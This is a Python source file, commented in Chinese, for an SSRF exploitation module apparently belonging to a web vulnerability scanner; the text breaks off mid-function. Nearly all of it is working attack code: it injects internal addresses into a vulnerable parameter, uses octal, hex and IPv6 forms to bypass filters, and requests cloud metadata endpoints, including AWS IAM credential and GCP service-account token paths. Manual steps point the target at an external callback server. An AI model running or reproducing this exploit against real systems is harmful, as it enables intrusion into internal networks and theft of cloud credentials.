#!/usr/bin/env python # -*- coding: utf-8 -*- """ SSRF(服务器端请求伪造)漏洞利用模块 """ import logging import re import urllib.parse import random import string import socket import json import ipaddress logger = logging.getLogger('xss_scanner') class SSRFExploit: """SSRF漏洞利用类""" def __init__(self, http_client): """ 初始化SSRF漏洞利用模块 Args: http_client: HTTP客户端对象 """ self.http_client = http_client # 内部服务目标 self.internal_targets = [ "127.0.0.1", # 本地主机 "localhost", # 本地主机 "0.0.0.0", # 任意地址 "10.0.0.0/8", # 私有IP A类 "172.16.0.0/12", # 私有IP B类 "192.168.0.0/16", # 私有IP C类 "169.254.169.254", # AWS元数据服务 "metadata.google.internal", # GCP元数据 "100.100.100.200", # 阿里云元数据 "169.254.169.254", # Azure元数据 "127.0.0.1:25", # SMTP "127.0.0.1:22", # SSH "127.0.0.1:1433", # MS SQL "127.0.0.1:3306", # MySQL "127.0.0.1:5432", # PostgreSQL "127.0.0.1:6379", # Redis "127.0.0.1:9200", # Elasticsearch "127.0.0.1:11211", # Memcached "127.0.0.1:27017", # MongoDB "127.0.0.1:8500", # Consul "127.0.0.1:2375", # Docker API "127.0.0.1:8080", # 常见Web服务 "127.0.0.1:8000", # 常见Web服务 "127.0.0.1:5000", # 常见Web服务 "127.0.0.1:3000" # 常见Web服务 ] # 内部服务路径 self.service_paths = { "redis": ["/", ""], "mysql": ["/", ""], "elasticsearch": ["/", "/_cat/indices", "/_cluster/health"], "mongodb": ["/", "/stats"], "memcached": ["/", ""], "docker": ["/", "/images/json", "/containers/json"], "etcd": ["/", "/v2/keys", "/v2/members"], "consul": ["/v1/catalog/services", "/v1/agent/self"], "kubernetes": ["/api/v1/pods", "/api/v1/namespaces"] } # 云服务商元数据URL self.cloud_metadata_urls = { "aws": [ "http://169.254.169.254/latest/meta-data/", "http://169.254.169.254/latest/meta-data/local-hostname", "http://169.254.169.254/latest/meta-data/public-hostname", "http://169.254.169.254/latest/meta-data/local-ipv4", "http://169.254.169.254/latest/meta-data/public-ipv4", "http://169.254.169.254/latest/meta-data/iam/security-credentials/" ], "gcp": [ "http://metadata.google.internal/computeMetadata/v1/", "http://metadata.google.internal/computeMetadata/v1/instance/hostname", "http://metadata.google.internal/computeMetadata/v1/instance/id", "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" ], "azure": [ "http://169.254.169.254/metadata/instance?api-version=2019-06-01", "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01" ], "alibaba": [ "http://100.100.100.200/latest/meta-data/", "http://100.100.100.200/latest/meta-data/instance-id", "http://100.100.100.200/latest/meta-data/region-id" ] } # IP替代表示法 self.ip_alternative_forms = { "127.0.0.1": [ "localhost", "127.0.1", "127.1", "2130706433", # 十进制表示 "0x7f000001", # 十六进制表示 "0177.0.0.01", # 八进制表示 "0177.0.0.1", "0177.0.1", "0177.1", "::1", # IPv6表示 "::ffff:127.0.0.1", # IPv6 映射 "[::1]", "[::ffff:127.0.0.1]", "1278.1.1.1" ] } # SSRF绕过技术 self.ssrf_bypasses = [ "@", # URL认证绕过(user:pass@host) "#", # URL片段 "?", # URL查询参数 "%23", # URL编码的# "%3F", # URL编码的? "\r\n", # CRLF注入 "%0D%0A", # URL编码的CRLF "/.", # 目录遍历 "//" # 双斜杠 ] # 常见参数名 self.common_parameters = [ "url", "uri", "link", "src", "source", "redirect", "redirect_to", "image", "img", "file", "download", "upload", "domain", "host", "port", "callback", "return", "return_to", "next", "target", "feed", "fetch", "site", "html", "page", "data", "reference", "reference_url" ] def exploit(self, vulnerability): """ 利用SSRF漏洞 Args: vulnerability: 漏洞信息 Returns: dict: 利用结果 """ logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}") url = vulnerability.get('url') parameter = vulnerability.get('parameter') payload = vulnerability.get('payload', '') if not url or not parameter: return { 'success': False, 'message': '缺少必要的漏洞信息(URL或参数名)', 'data': None } # 尝试探测内部服务 internal_services = [] successful_payloads = [] # 生成随机标记用于OAST(带外应用安全测试) verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8)) oast_domain = f"ssrf-{verification_id}.example.com" oast_url = f"http://{oast_domain}/" logger.info(f"生成的OAST域名: {oast_domain}") # 0. 首先尝试OAST探测(如果有真实的回调服务器) if hasattr(self, 'callback_server') and self.callback_server: logger.info("尝试使用OAST检测SSRF漏洞") result = self._try_oast_detection(url, parameter, oast_url) if result and result['success']: return result # 1. 尝试本地服务 logger.info("尝试探测本地服务") for target in self.internal_targets[:5]: # 只尝试前5个目标 # 基本请求 result = self._try_internal_service(url, parameter, f"http://{target}") if result and result['success']: internal_services.append(result['data']['target']) successful_payloads.append(result['data']['payload']) logger.info(f"发现可访问的内部服务: {target}") # 尝试一些端口,如果目标是IP地址 if re.match(r"^\d+\.\d+\.\d+\.\d+$", target): for port in [80, 8080, 8000, 5000, 3000, 22, 6379]: result = self._try_internal_service(url, parameter, f"http://{target}:{port}") if result and result['success']: internal_services.append(f"{target}:{port}") successful_payloads.append(result['data']['payload']) logger.info(f"发现可访问的内部服务: {target}:{port}") # 2. 尝试云服务商元数据 logger.info("尝试探测云服务商元数据") cloud_metadata = {} for provider, urls in self.cloud_metadata_urls.items(): for metadata_url in urls[:2]: # 只尝试前2个URL result = self._try_internal_service(url, parameter, metadata_url) if result and result['success']: if provider not in cloud_metadata: cloud_metadata[provider] = [] cloud_metadata[provider].append({ 'url': metadata_url, 'response': result['data'].get('response', ''), 'payload': result['data']['payload'] }) successful_payloads.append(result['data']['payload']) logger.info(f"发现可访问的云服务商元数据: {metadata_url}") # 3. 尝试一些IP替代表示法绕过手段(针对localhost) logger.info("尝试使用IP替代表示法绕过") for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]: # 只尝试前5个替代表示 result = self._try_internal_service(url, parameter, f"http://{alt_ip}") if result and result['success']: internal_services.append(alt_ip) successful_payloads.append(result['data']['payload']) logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}") # 编译结果 if internal_services or cloud_metadata: logger.info(f"SSRF利用成功,发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据") # 选择一个最可靠的有效载荷作为PoC poc_payload = successful_payloads[0] if successful_payloads else payload # 构建 PoC URL parsed_url = urllib.parse.urlparse(url) query_params = dict(urllib.parse.parse_qsl(parsed_url.query)) query_params[parameter] = poc_payload new_query = urllib.parse.urlencode(query_params) poc_url = urllib.parse.urlunparse(( parsed_url.scheme, parsed_url.netloc, parsed_url.path, parsed_url.params, new_query, parsed_url.fragment )) return { 'success': True, 'message': 'SSRF漏洞利用成功', 'data': { 'internal_services': internal_services, 'cloud_metadata': cloud_metadata, 'successful_payloads': successful_payloads }, 'poc': poc_url } else: # 如果没有直接成功,返回手动验证步骤 logger.info("无法自动确认SSRF漏洞,提供手动验证步骤") return { 'success': False, 'message': '未能自动确认SSRF漏洞,但可能存在,请尝试手动验证', 'data': { 'parameter': parameter, 'url': url, 'oast_domain': oast_domain }, 'manual_steps': [ "1. 设置一个你控制的外部Web服务器,记录所有接收到的请求", f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test", "3. 如果你的服务器收到来自目标服务器的请求,则确认存在SSRF漏洞", "4. 尝试以下内部服务目标进行测试:", " - http://localhost/", " - http://127.0.0.1:8080/", " - http://169.254.169.254/latest/meta-data/ (AWS元数据)", "5. 尝试以下绕过技术:", " - http://0177.0.0.1/ (八进制IP)", " - http://0x7f000001/ (十六进制IP)", " - http://2130706433/ (整数IP)" ] } def _try_internal_service(self, url, parameter, target_url): """ 尝试通过SSRF访问内部服务 Args: url: 目标URL parameter: 参数名 target_url: 要访问的内部服务URL Returns: dict: 利用结果 """ try: logger.info(f"尝试访问内部服务: {target_url}") # 构建SSRF测试URL parsed_url = urllib.parse.urlparse(url) query_params = dict(urllib.parse.parse_qsl(parsed_url.query)) query_params[parameter] = target_url # 重建查询字符串 new_query = urllib.parse.urlencode(query_params) new_url = urllib.parse.urlunparse(( parsed_url.scheme, parsed_url.netloc, parsed_url.path, parsed_url.params, new_query, parsed_url.fragment )) # 发送请求 response = self.http_client.get(new_url) # 检查响应,查找SSRF成功的迹象 if response and response.status_code == 200: response_text = response.text # 检查常见的SSRF成功迹象 success_indicators = self._get_service_indicators(target_url) for indicator in success_indicators: if indicator in response_text: logger.info(f"内部服务访问成功,找到特征: {indicator}") return { 'success': True, 'message': f'成功利用SSRF漏洞访问内部服务: {target_url}', 'data': { 'target': target_url, 'parameter': parameter, 'payload': target_url, 'indicator': indicator, 'response': response_text[:200] + ('...' if len(response_text) > 200 else '') } } # 如果没有找到明确的特征,检查是否有其他常见服务标识 if any(keyword in response_text.lower() for keyword in [ 'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql', 'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized', '401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error', '